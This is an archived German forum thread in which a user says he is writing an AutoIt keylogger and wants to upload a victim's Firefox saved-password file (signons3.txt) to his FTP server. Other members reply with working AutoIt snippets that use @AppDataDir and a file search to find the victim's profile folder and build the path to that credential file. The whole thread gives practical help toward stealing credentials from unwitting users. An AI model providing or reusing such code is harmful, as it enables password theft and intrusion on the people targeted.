PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [AutoIT] Computername



krusty
01.01.2009, 18:01
halli hallo,
ich schreibe gerade nen kleinen sniffer/keylogger in autoit, nicht gerad der anspruchvollsten spache =D, aber es macht spass...
also mein problem, ich möchte eine datei auf meinen ftp uploaden:
C:/Dokumente und Einstellungen/COMPUTERNAME/Anwendungsdaten/Mozilla/Firefox/Profiles/f401vjgf.default/signons3.txt (verschlüsselte firefox pws)

Nun muss ich irgendwie an den Computernamen des opfers kommen...
hat wer ne ahnug, wie ich das anstellen könnte ?
wäre echt nett =D

viele grüße
Alex.

garwga
01.01.2009, 18:23
"C:/Dokumente und Einstellungen/"&@Computername&"/Anwendungsdaten/Mozilla/Firefox/Profiles/f401vjgf.default/signons3.txt"

Allerdings glaube ich das du da Computername mit Benutzername verwechselst. Von daher:

"C:/Dokumente und Einstellungen/"&@Username&"/Anwendungsdaten/Mozilla/Firefox/Profiles/f401vjgf.default/signons3.txt"
MfG,
garwga

AlterHacker
01.01.2009, 18:26
Was vllt nicht ganz uninterressant ist, dass der Profilordner überall anders ist ;)

"C:/Dokumente und Einstellungen/"&@Username&"/Anwendungsdaten/Mozilla/Firefox/Profiles/BLABLABLA.default/signons3.txt"

kknb
01.01.2009, 18:40
wenn windows auf auf ner anderen platte wie c, oder englisch etc ist..dann funktioniert eure lösung nicht...

machs so.


@AppDataDir&"/Mozilla/Firefox/Profiles/f401vjgf.default/signons3.txt"

krusty
01.01.2009, 18:46
I <3 u =DDDD
danke =)

garwga
01.01.2009, 19:04
halthalthalt....
So wird das ganze noch nicht funktionieren wie du es willst, da ja die Profilordner immer anders heißen wie AlterHacker oben geschrieben hat. Bei mir heist der Ordner z.B."cifunis0.default" jedoch ist das bei jedem anders. Deshalb musst du das so machen:

$1=FileFindFirstFile(@AppDataDir&"/Mozilla/Firefox/Profiles/*.*")
$2=FileFindNextFile($1)
$FirefoxPWs=(@AppDataDir&"Mozilla/Firefox/Profiles/"&$2&"/signons3.txt")
"$FirefoxPWs" ist dann am Ende die Variable die du weiterverwenden musst.
MfG